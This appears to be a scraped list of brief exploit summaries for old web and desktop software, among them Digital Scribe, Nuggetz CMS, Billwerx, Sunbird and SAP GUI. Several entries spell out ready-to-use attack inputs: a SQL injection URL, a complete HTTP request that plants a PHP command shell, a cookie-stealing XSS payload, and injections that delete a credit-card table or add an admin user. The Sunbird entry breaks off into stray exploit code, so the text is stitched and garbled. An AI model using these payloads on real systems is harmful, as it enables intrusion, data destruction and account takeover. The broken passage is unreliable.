Digital Scribe version 1.4.1 is vulnerable to multiple SQL Injection security flaws. In order to exploit them, the Magic Quotes GPG (php.ini) must be Off except one. An attacker can exploit this vulnerability by sending a malicious HTTP GET request to the vulnerable page. For example, http://site/path/stuworkdisplay.php?ID=-1) UNION ALL SELECT version(),user(),3,4,5,6,7,8,9,10,11%23
Mozilla Sunbird is a cross-platform calendar application, built upon Mozilla Toolkit. The main problem exist in dtoa implementation. Sunbird has the same dtoa as Firefox, etc. Problem exist in js3250.dll (version 4.0.0 - Netscape 32-bit JavaScript Module) DLL library and it is the same like SREASONRES:20090625. We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16>test.ics'); print myfile $header.$s.$expl.$footer;
The application oBlog is vulnerable to Persistant XSS due to the lack of proper input filtering. The vulnerable code is present in the file /oBloG/inc/functions.php, where the function filter() does not escape HTML characters.
Nuggetz CMS 1.0 is vulnerable to Remote Code Execution. The file ajaxsave.php is used to save any changes done in nugget. The parameter 'nugget' is used to call the file for ex. support.nugget, which is at /web_dir/data/. The changed values are written back to the respective nugget. The parameters 'pagevalue' and 'nugget' are not properly sanitized. It is possible to create/edit files in the web server which leads to creating a new file with php command shell (RCE). The following request creates shell.php at /nuggetz/: POST /nuggetz/nuggetz/admin/ajaxsave.php?nugget=../../shell.php%00 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Cookie: PHPSESSID=4m2iiqdt0q38cna2iemtfel7p3 Content-Type: application/x-www-form-urlencoded Content-Length: 45 pagevalue=<?php passthru($_GET['cmd']); ?> Shell Access: http://localhost/nuggetz/shell.php?cmd=dir
A remotely exploitable vulnerability was found in the database server core component. Exploitation of this bug does not require authentication and will lead to a remotely triggered denial of service of the database service. It is not likely that this bug could be otherwise exploited to compromise systems running vulnerable versions of SolidDB.
A regular employee can embed javascript code that could be executed within the context of the admin's browser. If the user edits their own profile by going to 'http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2' and places '<script>alert(document.cookie)</script>' into any of the following fields: 'firstname', 'billing address', 'billing city', 'billing province', 'billing postal', 'billing country' and then gives the following link to the admin: http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2 The user could potentially log the admins cookie and reset their own session thus gaining administration access. For SQL Injection, the description post value is unsanitized and can be exploited using ','1'); DELETE FROM credit_cards;/* or ','1'); insert into employees (username, password, firstname, lastname, email, admin) values ('hacker','hacker','hacker','hacker','hacker@hacker.com','1');/*
This exploit is a buffer overflow vulnerability in the SAP GUI for Windows sapirrfc.dll ActiveX control. The vulnerability is triggered when a specially crafted Accept() method is called with a large string. This causes a stack-based buffer overflow, which can be used to execute arbitrary code.
Easy RM to MP3 Converter 2.7.3.700 is vulnerable to a buffer overflow vulnerability when a specially crafted .m3u file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .m3u file. The vulnerability is caused due to a boundary error when processing .m3u files. This can be exploited to cause a stack-based buffer overflow by supplying a specially crafted .m3u file with an overly long string.
This module exploits a stack buffer overflow in Xenorate 2.50 By creating a specially crafted xpl file, an an attacker may be able to execute arbitrary code.
SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
Services By CQR